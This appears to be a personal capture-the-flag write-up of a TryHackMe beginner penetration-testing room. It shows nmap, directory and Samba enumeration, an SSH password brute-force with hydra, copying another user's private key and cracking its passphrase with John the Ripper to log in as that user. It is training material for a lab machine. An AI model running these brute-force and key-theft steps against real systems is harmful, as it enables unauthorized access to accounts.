TryHackMe Room: https://tryhackme.com/room/basicpentestingjt
This room requires that you know the following:
- SSH
- SMB Enumeration
- Web Directory Enumeration
- Brute Forcing & Hash Cracking
- Some basic privilege escalation
Personally, this room wasn’t too difficult, though I did get stuck on privilege escalation for a bit.
Enumeration #
nmap -sS -p- -v -oA nmap/initial $IP
Host is up, received echo-reply ttl 63 (0.15s latency).
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 63
80/tcp open http syn-ack ttl 63
139/tcp open netbios-ssn syn-ack ttl 63
445/tcp open microsoft-ds syn-ack ttl 63
8009/tcp open ajp13 syn-ack ttl 63
8080/tcp open http-proxy syn-ack ttl 63
Read data files from: /usr/bin/../share/nmap
From this initial scan, we know which ports are open and a rudimentary idea of what services they host.
In the above scan, I’ve highlighted some of the services which we can also start scans for to save some time.
Before we start scans for specific ports, we can start an nmap scan to get more detailed information about the ports.
nmap -sS -sC -sV -O -p 22,80,139,445,8009,8080 $IP
Now we can also start scans for the services highlighted above:
To find directories on the web server:
feroxbuster --url http://$IP -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -o web_dirs --auto-tune -C 404
To enumerate Samba:
enum4linux $IP
While the scans are running, we can do some manual enumeration.
Manual Enumeration #
Loading up http://$IP:80, we can see the following maintenance notice.
We can try looking for a robots.txt file by visiting http://$IP/robots.txt
Here we can see some interesting information, we now know that the Apache Version is 2.4.18, this will come into use later when we are looking for vulnerabilities.
Scan Results #
For the sake of brevity, I’ve cut out decent portions of the scan results, and only kept what I consider to be interesting (Though considering I am learning too, I might leave out some silver bullet)
NMAP Scan Results:
Host is up, received echo-reply ttl 63 (0.15s latency).
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html).
| http-methods:
|_ Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.18 (Ubuntu)
139/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open ajp13 syn-ack ttl 63 Apache Jserv (Protocol v1.3)
| ajp-methods:
|_ Supported methods: GET HEAD POST OPTIONS
8080/tcp open http syn-ack ttl 63 Apache Tomcat 9.0.7
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/9.0.7
Aggressive OS guesses: Linux 3.10 - 3.13 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%), Linux 3.16 (95%), Linux 5.4 (94%), Linux 3.1 (93%), Linux 3.2 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (92%), Sony Android TV (Android 5.0) (92%), Android 5.0 - 6.0.1 (Linux 3.4) (92%), Android 5.1 (92%)
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb2-time:
| date: 2024-01-04T05:31:34
|_ start_date: N/A
|_clock-skew: mean: 1h40m00s, deviation: 2h53m14s, median: 0s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| BASIC2<00> Flags: <unique><active>
| BASIC2<03> Flags: <unique><active>
| BASIC2<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: basic2
| NetBIOS computer name: BASIC2\x00
| Domain name: \x00
| FQDN: basic2
|_ System time: 2024-01-04T00:31:36-05:00
Feroxbuster scan results:
200 GET 10l 24w 158c http://$IP/
200 GET 7l 42w 235c http://$IP/development/j.txt
200 GET 9l 89w 483c http://$IP/development/dev.txt
301 GET 9l 28w 318c http://$IP/development => http://$IP/development/
The user Jay seems to have weak credentials, we could attempt to brute force the password.
Enum4Linux Scan Results:
=================================( Share Enumeration on $IP )=================================
Sharename Type Comment
--------- ---- -------
Anonymous Disk
IPC$ IPC IPC Service (Samba Server 4.3.11-Ubuntu)
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP BASIC2
[+] Attempting to map shares on $IP
//$IP/Anonymous Mapping: OK Listing: OK Writing: N/A
[E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
//$IP/IPC$ Mapping: N/A Listing: N/A Writing: N/A
==================( Users on $IP via RID cycling (RIDS: 500-550,1000-1050) )==================
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
[+] Enumerating users using SID S-1-5-21-2853212168-2008227510-3551253869 and logon username '', password ''
S-1-5-21-2853212168-2008227510-3551253869-501 BASIC2\nobody (Local User)
S-1-5-21-2853212168-2008227510-3551253869-513 BASIC2\None (Domain Group)
We could login to the Anonymous Samba Share using smbclient, however since it gave me no new information, I have omitted it.
Enumeration Summary #
- Users
- Jan (Has weak credentials)
- Kay
- Services: (Ubuntu Server)
- Apache 2.4.18 (Port 80)
- OpenSSH 7.2p2 (Port 80)
- Samba 4.3.11 (Port 139 & 445)
- Apache Tomcat 9.0.7 (Port 8080)
Research #
Before we go to check for vulnerabilities in the services, we can start SSH bruteforcing for the user Jan to save some time.
hydra -l jan -P /usr/share/wordlists/rockyou.txt -f -v -V -t 4 $IP ssh
Apache 2.4.18 #
searchsploit Apache
Here we find a few results that may be useful later on:
Apache 2.4.17 < 2.4.38 - 'apache2ctl graceful' 'logrotate' Local Privilege escalation
Apache 2.4.x - Buffer Overflow
Apache 2.x - Memory Leak
Apache < 2.2.34 / < 2.4.27 - OPTIONS Memory Leak
OpenSSH 7.2p2 #
searchsploit openssh
OpenSSH 7.2p2 - Username Enumeration
OpenSSH < 7.4 - 'UsePrivilegeSeparation Disabled' Forwarded Unix Domain Sockets Privilege Escalation
Samba 4.3.11 #
searchsploit Samba
Samba 3.5.0 < 4.4.14/4.5.10/4.6.4 - 'is_known_pipename()' Arbitrary Module Load (Metasploit)
Initial Acess #
We can gain initial access using the bruteforced credentials:
ssh -l jan $IP
Privilege Escalation #
jan@basic2:~$ pwd
/home/jan
jan@basic2:~$ ls -la
total 12
drwxr-xr-x 2 root root 4096 Apr 23 2018 .
drwxr-xr-x 4 root root 4096 Apr 19 2018 ..
-rw------- 1 root jan 47 Apr 23 2018 .lesshst
jan@basic2:~$ cd ..
jan@basic2:/home$ ls
jan kay
jan@basic2:/home$ ls -la
total 16
drwxr-xr-x 4 root root 4096 Apr 19 2018 .
drwxr-xr-x 24 root root 4096 Apr 23 2018 ..
drwxr-xr-x 2 root root 4096 Apr 23 2018 jan
drwxr-xr-x 5 kay kay 4096 Apr 23 2018 kay
jan@basic2:/home$ cd kay/
jan@basic2:/home/kay$ ls -la
total 48
drwxr-xr-x 5 kay kay 4096 Apr 23 2018 .
drwxr-xr-x 4 root root 4096 Apr 19 2018 ..
-rw------- 1 kay kay 756 Apr 23 2018 .bash_history
-rw-r--r-- 1 kay kay 220 Apr 17 2018 .bash_logout
-rw-r--r-- 1 kay kay 3771 Apr 17 2018 .bashrc
drwx------ 2 kay kay 4096 Apr 17 2018 .cache
-rw------- 1 root kay 119 Apr 23 2018 .lesshst
drwxrwxr-x 2 kay kay 4096 Apr 23 2018 .nano
-rw------- 1 kay kay 57 Apr 23 2018 pass.bak
-rw-r--r-- 1 kay kay 655 Apr 17 2018 .profile
drwxr-xr-x 2 kay kay 4096 Apr 23 2018 .ssh
-rw-r--r-- 1 kay kay 0 Apr 17 2018 .sudo_as_admin_successful
-rw------- 1 root kay 538 Apr 23 2018 .viminfo
Not a lot to look at in the home directory. Surprisingly the home folder for jan is owned by root, and we can only read and execute.
However, the .ssh direcotry has read access, if we find a private key we could attempt to login as user kay
Score !!!
jan@basic2:/home/kay/.ssh$ ls
authorized_keys id_rsa id_rsa.pub
jan@basic2:/home/kay/.ssh$ cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,6ABA7DE35CDB65070B92C1F760E2FE75
[REDACTED]
-----END RSA PRIVATE KEY-----
Copying the key to our machine, and setting proper permissions chmod 400 id_rsa, we can now attempt to login as user kay.
$ ssh 10.10.19.163 -l kay -i key
Enter passphrase for key 'key':
kay@10.10.19.163's password:
Permission denied, please try again.
kay@10.10.19.163's password:
Permission denied, please try again.
kay@10.10.19.163's password:
kay@10.10.19.163: Permission denied (publickey,password).
Sadly, the key is password protected. We can try to crack the key and in the meantime, we can look at other privilege escalation vectors.
To crack the key, we can use John the Ripper, first we need to convert the SSH key to a hash, to do this we use ssh2john.py
python3 ssh2jobn.py id_rsa > id_rsa.hash
Once we have our hash, we can crack it using John the Ripper
john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa.hash
The hash is an MD5 hash, and only took a few seconds to crack.
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
******* (key)
1g 0:00:00:00 DONE (2024-01-05 06:52) 12.50g/s 1034Kp/s 1034Kc/s 1034KC/s behlat..bammer
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Using the cracked SSH key password, we can login to the user kay
kay@basic2:~$ ls
pass.bak
kay@basic2:~$ cat pass.bak
********************************************************
Logging in, we can read the pass.bak file, and complete the room
Self Review #
This is the section where I analyze my own methodoloy, look at other writeups, find what I might have missed and do my best to learn from these mistakes.
After reading several writeups, here are some writeups that were useful:
- https://medium.com/@JAlblas/tryhackme-basic-pentesting-walkthrough-9a1821f1d7c6
- Source code on maintenance post has comments which I missed.
- vim has SUID bit.
- https://www.scioshield.uk/thm-basic-pentesting/
- Jserv Vulnerability
- Incredibly detailed for Red Teaming & Blue Teaming